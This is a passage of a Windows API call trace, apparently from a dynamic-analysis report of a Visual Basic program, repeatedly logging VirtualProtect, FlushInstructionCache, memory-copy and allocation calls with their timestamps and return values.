FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.270] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.270] GetCurrentProcess () returned 0xffffffff [0102.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.271] GetCurrentProcess () returned 0xffffffff [0102.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.271] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.271] GetCurrentProcess () returned 0xffffffff [0102.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.271] GetCurrentProcess () returned 0xffffffff [0102.271] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.271] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.272] GetCurrentProcess () returned 0xffffffff [0102.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.272] GetCurrentProcess () returned 0xffffffff [0102.272] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.272] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.273] GetCurrentProcess () returned 0xffffffff [0102.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.273] GetCurrentProcess () returned 0xffffffff [0102.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.273] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.273] GetCurrentProcess () returned 0xffffffff [0102.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.273] GetCurrentProcess () returned 0xffffffff [0102.273] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.273] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.274] GetCurrentProcess () returned 0xffffffff [0102.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.274] GetCurrentProcess () returned 0xffffffff [0102.274] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.274] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.275] GetCurrentProcess () returned 0xffffffff [0102.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.275] GetCurrentProcess () returned 0xffffffff [0102.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.275] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.275] GetCurrentProcess () returned 0xffffffff [0102.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.275] GetCurrentProcess () returned 0xffffffff [0102.275] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.275] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.276] GetCurrentProcess () returned 0xffffffff [0102.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.276] GetCurrentProcess () returned 0xffffffff [0102.276] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.276] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.277] GetCurrentProcess () returned 0xffffffff [0102.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.277] GetCurrentProcess () returned 0xffffffff [0102.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.277] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.277] GetCurrentProcess () returned 0xffffffff [0102.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.277] GetCurrentProcess () returned 0xffffffff [0102.277] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.277] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.278] GetCurrentProcess () returned 0xffffffff [0102.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.278] GetCurrentProcess () returned 0xffffffff [0102.278] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.278] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.279] GetCurrentProcess () returned 0xffffffff [0102.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.279] GetCurrentProcess () returned 0xffffffff [0102.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.279] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.279] GetCurrentProcess () returned 0xffffffff [0102.279] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.279] GetCurrentProcess () returned 0xffffffff [0102.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.280] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.280] GetCurrentProcess () returned 0xffffffff [0102.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.280] GetCurrentProcess () returned 0xffffffff [0102.280] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.280] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.281] GetCurrentProcess () returned 0xffffffff [0102.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.281] GetCurrentProcess () returned 0xffffffff [0102.281] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.281] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.282] GetCurrentProcess () returned 0xffffffff [0102.282] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.287] GetAsyncKeyState (vKey=3) returned 0 [0102.287] GetAsyncKeyState (vKey=3) returned 0 [0102.287] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.287] CRetailMalloc_Alloc () returned 0xca3ced0 [0102.287] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.287] memcpy (in: _Dst=0xca3cef0, _Src=0x197724, _Size=0x18 | out: _Dst=0xca3cef0) returned 0xca3cef0 [0102.287] CRetailMalloc_Realloc () returned 0xca3ced0 [0102.287] CRetailMalloc_Free () returned 0x1 [0102.287] GetCurrentProcess () returned 0xffffffff [0102.287] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.287] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.288] GetCurrentProcess () returned 0xffffffff [0102.288] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.288] GetCurrentProcess () returned 0xffffffff [0102.288] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.288] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.289] GetCurrentProcess () returned 0xffffffff [0102.289] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.289] GetCurrentProcess () returned 0xffffffff [0102.289] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.289] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.289] GetCurrentProcess () returned 0xffffffff [0102.289] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.289] GetCurrentProcess () returned 0xffffffff [0102.290] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.290] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.290] GetCurrentProcess () returned 0xffffffff [0102.290] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.290] GetCurrentProcess () returned 0xffffffff [0102.290] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.290] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.291] GetCurrentProcess () returned 0xffffffff [0102.291] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.291] GetCurrentProcess () returned 0xffffffff [0102.291] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.291] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.292] GetCurrentProcess () returned 0xffffffff [0102.292] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.292] GetCurrentProcess () returned 0xffffffff [0102.292] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.292] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.292] GetCurrentProcess () returned 0xffffffff [0102.292] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.292] GetCurrentProcess () returned 0xffffffff [0102.292] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.292] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.293] GetCurrentProcess () returned 0xffffffff [0102.293] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.293] GetCurrentProcess () returned 0xffffffff [0102.293] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.293] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.294] GetCurrentProcess () returned 0xffffffff [0102.294] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.294] GetCurrentProcess () returned 0xffffffff [0102.294] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.294] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.295] GetCurrentProcess () returned 0xffffffff [0102.295] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.295] GetCurrentProcess () returned 0xffffffff [0102.295] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.295] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.295] GetCurrentProcess () returned 0xffffffff [0102.295] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.295] GetCurrentProcess () returned 0xffffffff [0102.295] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.295] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.296] GetCurrentProcess () returned 0xffffffff [0102.296] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.296] GetCurrentProcess () returned 0xffffffff [0102.296] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.296] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.297] GetCurrentProcess () returned 0xffffffff [0102.297] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.297] GetCurrentProcess () returned 0xffffffff [0102.297] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.297] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.297] GetCurrentProcess () returned 0xffffffff [0102.297] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.297] GetCurrentProcess () returned 0xffffffff [0102.297] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.297] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.299] GetCurrentProcess () returned 0xffffffff [0102.299] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.299] GetCurrentProcess () returned 0xffffffff [0102.299] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.299] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.299] GetCurrentProcess () returned 0xffffffff [0102.299] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.299] GetCurrentProcess () returned 0xffffffff [0102.300] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.300] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.300] GetCurrentProcess () returned 0xffffffff [0102.300] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.300] GetCurrentProcess () returned 0xffffffff [0102.300] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.300] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.301] GetCurrentProcess () returned 0xffffffff [0102.301] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.301] GetCurrentProcess () returned 0xffffffff [0102.301] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.301] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.302] GetCurrentProcess () returned 0xffffffff [0102.302] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.302] GetCurrentProcess () returned 0xffffffff [0102.302] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.302] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.302] GetCurrentProcess () returned 0xffffffff [0102.302] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.302] GetCurrentProcess () returned 0xffffffff [0102.302] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.302] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.303] GetCurrentProcess () returned 0xffffffff [0102.303] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.303] GetCurrentProcess () returned 0xffffffff [0102.303] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.303] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.304] GetCurrentProcess () returned 0xffffffff [0102.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.304] GetCurrentProcess () returned 0xffffffff [0102.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.304] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.304] GetCurrentProcess () returned 0xffffffff [0102.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.304] GetCurrentProcess () returned 0xffffffff [0102.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.304] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.305] GetCurrentProcess () returned 0xffffffff [0102.305] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.305] GetCurrentProcess () returned 0xffffffff [0102.305] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.305] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.306] GetCurrentProcess () returned 0xffffffff [0102.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.306] GetCurrentProcess () returned 0xffffffff [0102.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.306] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.306] GetCurrentProcess () returned 0xffffffff [0102.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.306] GetCurrentProcess () returned 0xffffffff [0102.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.307] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.307] GetCurrentProcess () returned 0xffffffff [0102.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.307] GetCurrentProcess () returned 0xffffffff [0102.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.307] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.308] GetCurrentProcess () returned 0xffffffff [0102.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.308] GetCurrentProcess () returned 0xffffffff [0102.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.308] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.308] GetCurrentProcess () returned 0xffffffff [0102.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.308] GetCurrentProcess () returned 0xffffffff [0102.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.309] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.309] GetCurrentProcess () returned 0xffffffff [0102.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.309] GetCurrentProcess () returned 0xffffffff [0102.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.309] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.310] GetCurrentProcess () returned 0xffffffff [0102.310] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.311] GetAsyncKeyState (vKey=3) returned 0 [0102.311] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.311] CRetailMalloc_Alloc () returned 0xca3cf30 [0102.311] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.311] memcpy (in: _Dst=0xca3cf50, _Src=0x197724, _Size=0x18 | out: _Dst=0xca3cf50) returned 0xca3cf50 [0102.311] CRetailMalloc_Realloc () returned 0xca3cf30 [0102.311] CRetailMalloc_Free () returned 0x1 [0102.312] GetCurrentProcess () returned 0xffffffff [0102.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.312] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.312] GetCurrentProcess () returned 0xffffffff [0102.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.312] GetCurrentProcess () returned 0xffffffff [0102.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.312] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.314] GetCurrentProcess () returned 0xffffffff [0102.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.314] GetCurrentProcess () returned 0xffffffff [0102.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.314] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.315] GetCurrentProcess () returned 0xffffffff [0102.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.315] GetCurrentProcess () returned 0xffffffff [0102.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.315] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.315] GetCurrentProcess () returned 0xffffffff [0102.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.315] GetCurrentProcess () returned 0xffffffff [0102.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.315] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.316] GetCurrentProcess () returned 0xffffffff [0102.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.316] GetCurrentProcess () returned 0xffffffff [0102.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.316] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.317] GetCurrentProcess () returned 0xffffffff [0102.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.317] GetCurrentProcess () returned 0xffffffff [0102.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.317] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.317] GetCurrentProcess () returned 0xffffffff [0102.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.317] 